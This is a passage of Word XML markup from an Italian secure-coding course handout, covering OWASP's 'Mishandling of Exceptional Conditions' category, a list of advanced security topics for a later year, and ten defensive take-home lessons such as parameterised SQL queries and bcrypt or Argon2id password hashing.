        <w:t xml:space="preserve">E. Mishandling of Exceptional Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cos’è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Categoria nuova della OWASP Top 10:2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(A10). Vulnerabilità che si manifestano quando il sistema è in stato anomalo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Stack trace pubblicate al pubblico → information disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Try/except che ingoiano errori di sicurezza (fail open invece di fail secure)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Gestione errata di null pointer / risorse esaurite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Comportamenti diversi a seconda del problema (timing attacks su login:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utente non esiste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10ms vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password errata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">50ms)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">principio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fail secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Errori generici verso il pubblico, dettagli solo nei log. Test di chaos engineering per verificare che il sistema sotto stress non scopra le sue parti molli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché solo cenno qui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trasversale, ne abbiamo visto i principi nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="430"/>
    <w:bookmarkEnd w:id="431"/>
    <w:bookmarkStart w:id="432" w:name="le-altre-cose-che-vedrai-al-secondo-anno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="sec_10_6"/>
      <w:r>
        <w:t xml:space="preserve">10.6 Le altre cose che vedrai al secondo anno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senza nemmeno fare un paragrafo per ciascuna, ecco la lista delle aree avanzate non coperte:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Modeling strutturato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con framework STRIDE (S — Spoofing, T — Tampering, R — Repudiation, I — Information Disclosure, D — Denial of Service, E — Elevation of Privilege)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— la matrice mondiale delle tecniche di attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Kill Chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ciclo di vita di un attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth 2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OpenID Connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— autenticazione delegata moderna</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Factor Authentication (MFA)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— implementazione TOTP, WebAuthn, passkey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Container security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Docker, Kubernetes, image scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— IAM, principio del minimo privilegio nei cloud provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Secret management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— HashiCorp Vault, cloud secret managers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DAST e SAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— strumenti di analisi statica e dinamica del codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Web Application Firewall, configurazione e bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— metodologia, strumenti (Burp Suite, ZAP, Metasploit), report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bug bounty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— l’industria dei programmi di ricompensa per vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Incident response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— cosa fare quando il breach è già successo: detection, contenimento, eradicazione, recovery, lessons learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM avanzato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— configurazione di Wazuh, Splunk, Elastic Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Threat Intelligence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— IoC, TTPs, attribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— analisi post-incident di sistemi compromessi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa lista è lunga. Significa che la cybersecurity è una disciplina vasta e in evoluzione. Significa anche — e questo è il messaggio che voglio lasciarti — che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la dispensa che hai appena finito non è il punto di arrivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è il punto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">partenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per una professione che ti darà cose nuove da imparare per tutta la carriera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="432"/>
    <w:bookmarkStart w:id="433" w:name="cosa-portarsi-a-casa-dal-corso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="sec_10_7"/>
      <w:r>
        <w:t xml:space="preserve">10.7 Cosa portarsi a casa dal corso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riassumere 10 capitoli in 10 punti. Se ti rimane solo questa pagina della dispensa, queste sono le cose che voglio che tu non dimentichi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il compilatore controlla la sintassi. L’attaccante controlla la logica.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La responsabilità di immaginare gli abusi è dello sviluppatore — non c’è uno strumento che lo faccia per te. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cinque principi attraversano tutto.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Minimo privilegio, difesa in profondità, fail secure, semplicità, separazione dei compiti. Tornano in ogni capitolo, in ogni vulnerabilità, in ogni difesa. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La sicurezza è anche obbligo di legge.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GDPR, NIS 2, Cyber Resilience Act non sono lavoro per gli avvocati: sono requisiti tecnici travestiti da norme. Le scelte tecniche di questo corso sono in molti casi adempimenti normativi. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP è stateless, le sessioni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ricordano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il cookie di sessione vale quanto la password: chi ce l’ha è autenticato. Per questo i flag</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w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono parte del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> della sicurezza, non un dettaglio. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, 8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le API REST sono il presente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Più del 60% degli incidenti applicativi del 2024 ha coinvolto API. La sicurezza delle API non è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un caso particolare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è la regola. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">-bis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 è il vocabolario condiviso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Imparare a memoria le 10 voci della 2025 è uno dei migliori investimenti che puoi fare per la tua carriera. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai concatenare input dell’utente in stringhe SQL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sempre query parametriche. È UNA RIGA di codice scritta nel modo giusto, ed elimina la vulnerabilità che ha causato i breach più grandi della storia. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticazione ≠ autorizzazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il fatto che l’utente sia loggato non significa nulla rispetto a se può accedere a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">quella specifica risorsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verificare proprietà sempre, ovunque, server-side. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le password si hashano con bcrypt o Argon2id.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mai in chiaro, mai con MD5/SHA-1/SHA-256, mai cifrate. Il salt va incluso (bcrypt/Argon2id lo fanno automaticamente). (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai disabilitare l’escape automatico del template engine.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mai concatenare HTML a mano con dati utente. Le difese in profondità (HttpOnly, CSP) chiudono quello che resta. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’80% del codice di un’app moderna è scritto da altri.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutti i loro bug sono i tuoi bug.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ Dependabot sono il minimo sindacale. SBOM dal 2027 obbligo CRA. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal è prevenibile in tre righe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: basename, whitelist estensioni, realpath con verifica prefisso. La soluzione preferita è non passare nomi file dall’utente, ma ID dal database. (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
